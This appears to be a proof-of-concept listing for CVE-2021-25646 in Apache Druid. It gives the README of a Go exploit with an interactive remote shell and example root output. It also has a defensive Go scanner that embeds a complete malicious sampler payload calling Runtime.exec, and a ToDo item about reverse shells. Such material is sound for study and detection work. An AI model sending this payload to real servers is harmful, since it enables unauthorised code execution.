POC details: 66e083fe3c31a250d8818822e19edbba1c8aaad8

Source
Related vulnerability
Title: Apache Druid access control error vulnerability (CVE-2021-25646)
Description: Apache Druid is an open-source, column-oriented distributed database written in Java and maintained by the Apache Software Foundation. Apache Druid 0.20.0 and earlier contain an access control flaw: a user who can reach the API can force Druid to run user-supplied JavaScript code for a single request regardless of server configuration, and thereby execute code with the privileges of the Druid server process. Druid ships with no authenticator configured by default, so on a default deployment no credentials are needed. The issue was fixed in Druid 0.20.1.
Description
A proof-of-concept for CVE-2021-25646, which allows command injection.
Introduction
# CVE-2021-25646 Proof-of-Concept (Go Version)

## Overview

This repository contains a proof-of-concept (PoC) exploit for [CVE-2021-25646](https://nvd.nist.gov/vuln/detail/CVE-2021-25646), a remote code execution vulnerability in [Apache Druid](https://druid.apache.org/) 0.20.0 and earlier (fixed in 0.20.1).  
The exploit is written in Go and provides an interactive prompt from which commands are run on the target with the privileges of the Druid server process.

---

## Features

- **Interactive Command Injection:**  
  Execute arbitrary commands on a vulnerable Apache Druid server through an interactive shell interface.

---

## Build

You need [Go](https://golang.org/dl/) installed (version 1.23.4 recommended).

```bash
go build .
```

This will produce a binary in the current directory.

---

## Usage

You can run the exploit either by building the binary or directly with `go run`.

### Command-Line Options

- `-i` : Target Druid server IP address (required)
- `-p` : Target Druid server port (required; 8888 is the default port of the Druid router, which proxies the indexer API)
- `-proxy` : Proxy URL to route the requests through, e.g. an intercepting proxy for inspecting traffic (optional)

### Examples

**Run the built binary:**

```bash
./cve -i 127.0.0.1 -p 8888
```

**Or run directly with Go:**

```bash
go run main.go -i 127.0.0.1 -p 8888
```

---

## Example Session

```bash
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
```

---

## Technical Details

- **Vulnerability:**  
  The exploit abuses the sampler endpoint of the Druid indexer service (`/druid/indexer/v1/sampler`). The ingestion spec posted there may contain a JavaScript-typed component, and in Druid 0.20.0 and earlier the request itself could turn JavaScript execution on for that request even when `druid.javascript.enabled` is `false` on the server. The JavaScript runs inside the JVM, so it can reach `java.lang.Runtime` and spawn a shell; the interactive prompt wraps each command in such a crafted JSON payload and sends it to the target.

- **References:**  
  - [CVE-2021-25646 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-25646)
  - [Apache Druid Security Advisory](https://github.com/apache/druid/security/advisories/GHSA-2p3x-3w7x-v2wq)
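
A defender-side counterpart to the request shape described above, as an added example that is my own code and not the project's `utils/payload.go`: it parses a sampler request body, walks the JSON tree and reports every component whose `type` is `javascript`, together with whether it carries the empty-string `enabled` override seen in public CVE-2021-25646 payloads. The two request bodies are constructed for this example; the same function can be run over bodies captured at a proxy or logged by the router.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
)

// Finding is one JavaScript-typed component located in a Druid spec.
type Finding struct {
	Path     string // dotted JSON path of the component
	Function string // embedded JavaScript source, if present
	Override bool   // carries the per-request JavaScript enable override
}

// findJavaScript walks a decoded JSON tree and records every object whose
// "type" discriminator is "javascript". Druid uses that type for JavaScript
// filters, aggregators, extraction functions and parsers; all of them run the
// supplied "function" source when JavaScript execution is enabled.
func findJavaScript(v interface{}, path string, out *[]Finding) {
	switch node := v.(type) {
	case map[string]interface{}:
		if t, ok := node["type"].(string); ok && t == "javascript" {
			fn, _ := node["function"].(string)
			*out = append(*out, Finding{Path: path, Function: fn, Override: hasEnableOverride(node)})
		}
		for k, child := range node {
			findJavaScript(child, joinPath(path, k), out)
		}
	case []interface{}:
		for i, child := range node {
			findJavaScript(child, fmt.Sprintf("%s[%d]", path, i), out)
		}
	}
}

// hasEnableOverride reports whether the object carries the empty-string
// property with "enabled" set, the shape public CVE-2021-25646 payloads use to
// switch JavaScript on for one request regardless of druid.javascript.enabled.
func hasEnableOverride(node map[string]interface{}) bool {
	cfg, ok := node[""].(map[string]interface{})
	if !ok {
		return false
	}
	switch e := cfg["enabled"].(type) {
	case bool:
		return e
	case string:
		return e == "true"
	}
	return false
}

func joinPath(path, key string) string {
	if path == "" {
		return key
	}
	return path + "." + key
}

// ScanSpec parses a request body and returns every JavaScript component in it.
// Any finding in a body posted to /druid/indexer/v1/sampler is the
// CVE-2021-25646 pattern on a server that has druid.javascript.enabled=false.
func ScanSpec(body []byte) ([]Finding, error) {
	var doc interface{}
	if err := json.Unmarshal(body, &doc); err != nil {
		return nil, err
	}
	var out []Finding
	findJavaScript(doc, "", &out)
	return out, nil
}

// Constructed sample bodies (not taken from the project): a normal sampler spec
// with a selector filter, and the same spec with the filter swapped for a
// JavaScript filter that reaches into the JVM and carries the enable override.
const benignSpec = `{"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"ts\":1,\"added\":\"1\"}"},"inputFormat":{"type":"json"}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"ts","format":"auto"},"dimensionsSpec":{},"transformSpec":{"filter":{"type":"selector","dimension":"added","value":"1"}}}},"samplerConfig":{"numRows":10}}`

const maliciousSpec = `{"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"ts\":1,\"added\":\"1\"}"},"inputFormat":{"type":"json"}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"ts","format":"auto"},"dimensionsSpec":{},"transformSpec":{"filter":{"type":"javascript","dimension":"added","function":"function(value){ java.lang.Runtime.getRuntime().exec('id'); return true; }","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}}`

func main() {
	for name, body := range map[string]string{"benign": benignSpec, "malicious": maliciousSpec} {
		findings, err := ScanSpec([]byte(body))
		if err != nil {
			fmt.Fprintln(os.Stderr, name, err)
			os.Exit(1)
		}
		fmt.Printf("%s: %d finding(s)\n", name, len(findings))
		for _, f := range findings {
			fmt.Printf("  at %s (override=%v): %s\n", f.Path, f.Override, f.Function)
		}
	}
}
```

Matching on the `type` discriminator rather than on a string such as `Runtime.getRuntime()` is deliberate: the function body is attacker-controlled and trivially obfuscated, while any JavaScript component in a sampler request is already out of policy on a server that has JavaScript disabled.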

---

## ToDo 
- [ ] Add support for HTTPS
- [ ] Automate switch to reverse shell
- [ ] More native-feeling command prompt

---

## Disclaimer

This software is provided **for educational purposes only**.  
The author is **not responsible** for any misuse or damage caused by this code.  
Always obtain **proper authorization** before testing any system.
File snapshot

```
[4.0K] /data/pocs/66e083fe3c31a250d8818822e19edbba1c8aaad8
├── [ 22] go.mod
├── [1.2K] main.go
├── [2.0K] README.md
└── [4.0K] utils
    └── [1.8K] payload.go

1 directory, 4 files
```